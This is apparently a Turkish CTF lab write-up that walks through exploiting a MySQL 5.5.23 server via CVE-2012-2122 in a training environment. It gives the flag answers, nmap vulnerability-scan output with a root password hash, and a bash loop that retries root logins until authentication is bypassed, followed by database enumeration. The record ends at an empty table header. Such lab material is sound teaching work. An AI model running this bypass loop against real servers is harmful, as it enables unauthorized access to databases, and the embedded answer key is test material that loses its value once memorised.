# Hack Databases! - 2 MySQL!


**Açıklama**:

CyberPath Bank'da HTTP Serverları test etmeye devam ediyorsunuz. Bugün MySQL database çalıştıran serverı test edeceksiniz.

MySQL, açık kaynaklı bir ilişkisel veritabanı yönetim sistemidir. Adı, kurucu ortak Michael Widenius'un kızının adı olan "My" ve Structured Query Language'in kısaltması olan "SQL" in birleşimidir.


**Amaç**:

- Ip adresi ile enum gerçekleştirip çalışan servisleri belirlemek.
- Zaafiyetli servisi ve CVE ID'sini bulmak.
- CVE ID üzerinden araştırma ile sızma yöntemini bulup serverı ele geçirmek.

**Flags**:
- Serverda çalışan uygulamanın ismi ve versiyonu nedir?
    - answer: **MySQL 5.5.23**
- Uygulama ait CVE?
    - answer: **CVE-2012-2122**
- Servera açığı kullanarak bağlanın, server içerisinde kaç database vardır?
    - answer: **5**
- company database'i kullanın, employees içinden şirkette en yüksek maaş alan çalışanı bulun?
    - answer: **KING**

## **Solution**:

```bash
attacker@cyberpath:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.0.2  netmask 255.255.255.0  broadcast 10.0.0.255
        ether 02:42:0a:00:00:02  txqueuelen 0  (Ethernet)
        RX packets 170  bytes 13774 (13.7 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 105  bytes 111196 (111.1 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

attacker@cyberpath:~$ nmap -sC -sV --script vuln 10.0.0.32 -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-20 08:58 UTC
Nmap scan report for mysql_0_mysql_server_1.mysql_0_internal_network (10.0.0.32)
Host is up (0.00025s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
3306/tcp open  mysql   MySQL 5.5.23
| mysql-vuln-cve2012-2122:
|   VULNERABLE:
|   Authentication bypass in MySQL servers.
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2012-2122
|       When a user connects to MariaDB/MySQL, a token (SHA
|       over a password and a random scramble string) is calculated and compared
|       with the expected value. Because of incorrect casting, it might've
|       happened that the token and the expected value were considered equal,
|       even if the memcmp() returned a non-zero value. In this case
|       MySQL/MariaDB would think that the password is correct, even while it is
|       not.  Because the protocol uses random strings, the probability of
|       hitting this bug is about 1/256.
|       Which means, if one knows a user name to connect (and "root" almost
|       always exists), she can connect using *any* password by repeating
|       connection attempts. ~300 attempts takes only a fraction of second, so
|       basically account password protection is as good as nonexistent.
|
|     Disclosure date: 2012-06-9
|     Extra information:
|       Server granted access at iteration #1500
|
|     root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
|
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122
|       http://seclists.org/oss-sec/2012/q2/493
|_      https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
| vulners:
|   cpe:/a:mysql:mysql:5.5.23:
|       MSF:ILITIES/LINUXRPM-RHSA-2012-1462/    9.0     https://vulners.com/metasploit/MSF:ILITIES/LINUXRPM-RHSA-2012-1462/     *EXPLOIT*
|       CVE-2012-3163   9.0     https://vulners.com/cve/CVE-2012-3163
|       MSF:ILITIES/ORACLE-MYSQL-CVE-2012-3158/ 7.5     https://vulners.com/metasploit/MSF:ILITIES/ORACLE-MYSQL-CVE-2012-3158/  *EXPLOIT*
|       MSF:ILITIES/GENTOO-LINUX-CVE-2012-3158/ 7.5     https://vulners.com/metasploit/MSF:ILITIES/GENTOO-LINUX-CVE-2012-3158/  *EXPLOIT*
|       MSF:ILITIES/CENTOS_LINUX-CVE-2012-3158/ 7.5     https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2012-3158/  *EXPLOIT*
|       MSF:ILITIES/ALPINE-LINUX-CVE-2012-3158/ 7.5     https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2012-3158/  *EXPLOIT*
|       CVE-2013-1492   7.5     https://vulners.com/cve/CVE-2013-1492
|       CVE-2012-3158   7.5     https://vulners.com/cve/CVE-2012-3158
|       CVE-2012-0553   7.5     https://vulners.com/cve/CVE-2012-0553
|       MSF:ILITIES/LINUXRPM-RHSA-2013-0219/    6.8     https://vulners.com/metasploit/MSF:ILITIES/LINUXRPM-RHSA-2013-0219/     *EXPLOIT*
|       CVE-2013-0389   6.8     https://vulners.com/cve/CVE-2013-0389
|       CVE-2013-0384   6.8     https://vulners.com/cve/CVE-2013-0384
|       CVE-2012-5060   6.8     https://vulners.com/cve/CVE-2012-5060
|       CVE-2013-0385   6.6     https://vulners.com/cve/CVE-2013-0385
|       CVE-2013-1521   6.5     https://vulners.com/cve/CVE-2013-1521
|       CVE-2013-2378   6.0     https://vulners.com/cve/CVE-2013-2378
|       CVE-2013-1552   6.0     https://vulners.com/cve/CVE-2013-1552
|       MSF:ILITIES/CENTOS_LINUX-CVE-2012-1702/ 5.0     https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2012-1702/  *EXPLOIT*
|       CVE-2012-1702   5.0     https://vulners.com/cve/CVE-2012-1702
|       CVE-2011-2262   5.0     https://vulners.com/cve/CVE-2011-2262
|       CVE-2013-0383   4.3     https://vulners.com/cve/CVE-2013-0383
|       SSV:60599       4.0     https://vulners.com/seebug/SSV:60599    *EXPLOIT*
|       SSV:60597       4.0     https://vulners.com/seebug/SSV:60597    *EXPLOIT*
|       SSV:60344       4.0     https://vulners.com/seebug/SSV:60344    *EXPLOIT*
|       MSF:ILITIES/ORACLE-MYSQL-CVE-2014-0402/ 4.0     https://vulners.com/metasploit/MSF:ILITIES/ORACLE-MYSQL-CVE-2014-0402/  *EXPLOIT*
|       MSF:ILITIES/GENTOO-LINUX-CVE-2012-0572/ 4.0     https://vulners.com/metasploit/MSF:ILITIES/GENTOO-LINUX-CVE-2012-0572/  *EXPLOIT*
|       MSF:ILITIES/F5-BIG-IP-CVE-2014-0412/    4.0     https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2014-0412/     *EXPLOIT*
|       MSF:ILITIES/F5-BIG-IP-CVE-2014-0401/    4.0     https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2014-0401/     *EXPLOIT*
|       CVE-2014-0412   4.0     https://vulners.com/cve/CVE-2014-0412
|       CVE-2014-0402   4.0     https://vulners.com/cve/CVE-2014-0402
|       CVE-2014-0401   4.0     https://vulners.com/cve/CVE-2014-0401
|       CVE-2014-0386   4.0     https://vulners.com/cve/CVE-2014-0386
|       CVE-2013-3808   4.0     https://vulners.com/cve/CVE-2013-3808
|       CVE-2013-3804   4.0     https://vulners.com/cve/CVE-2013-3804
|       CVE-2013-3802   4.0     https://vulners.com/cve/CVE-2013-3802
|       CVE-2013-2392   4.0     https://vulners.com/cve/CVE-2013-2392
|       CVE-2013-2389   4.0     https://vulners.com/cve/CVE-2013-2389
|       CVE-2013-1555   4.0     https://vulners.com/cve/CVE-2013-1555
|       CVE-2012-3180   4.0     https://vulners.com/cve/CVE-2012-3180
|       CVE-2012-3173   4.0     https://vulners.com/cve/CVE-2012-3173
|       CVE-2012-3150   4.0     https://vulners.com/cve/CVE-2012-3150
|       CVE-2012-2749   4.0     https://vulners.com/cve/CVE-2012-2749
|       CVE-2012-1734   4.0     https://vulners.com/cve/CVE-2012-1734
|       CVE-2012-1705   4.0     https://vulners.com/cve/CVE-2012-1705
|       CVE-2012-0574   4.0     https://vulners.com/cve/CVE-2012-0574
|       CVE-2012-0572   4.0     https://vulners.com/cve/CVE-2012-0572
|       CVE-2012-0540   4.0     https://vulners.com/cve/CVE-2012-0540
|       CVE-2014-0437   3.5     https://vulners.com/cve/CVE-2014-0437
|       CVE-2012-3197   3.5     https://vulners.com/cve/CVE-2012-3197
|       CVE-2014-0393   3.3     https://vulners.com/cve/CVE-2014-0393
|       MSF:ILITIES/ALPINE-LINUX-CVE-2013-2391/ 3.0     https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2013-2391/  *EXPLOIT*
|       CVE-2013-2391   3.0     https://vulners.com/cve/CVE-2013-2391
|       CVE-2013-1506   2.8     https://vulners.com/cve/CVE-2013-1506
|       MSF:ILITIES/F5-BIG-IP-CVE-2013-5908/    2.6     https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2013-5908/     *EXPLOIT*
|_      CVE-2013-5908   2.6     https://vulners.com/cve/CVE-2013-5908

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.65 seconds

attacker@cyberpath:~$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 10.0.0.32 -P 3306 ; done
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 1045 (28000): Access denied for user 'root'@'mysql_0_attacker_cli_1.mysql_0_internal_network' (using password: YES)
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 117
Server version: 5.5.23 Source distribution

Copyright (c) 2000, 2021, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| company            |
| mysql              |
| performance_schema |
| test               |
+--------------------+
5 rows in set (0.00 sec)

mysql> use company;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-------------------+
| Tables_in_company |
+-------------------+
| binarytable       |
| bittable          |
| department        |
| deptlog           |
| dttable           |
| emplog            |
| employee          |
| enumtable         |
| estable           |
| floatingable      |
| integertable      |
| nonbinarytable    |
| nonbinarytable2   |
| nonbinarytable3   |
| numerictable      |
| numerictable2     |
| numerictable3     |
| settable          |
| travel            |
+-------------------+
19 rows in set (0.00 sec)

mysql> select * from employee;
+-------+--------+-----------+---------+------------+---------+---------+--------+
| empno | ename  | job       | manager | hiredate   | salary  | comm    | deptno |
+-------+--------+-----------+---------+------------+---------+---------+--------+
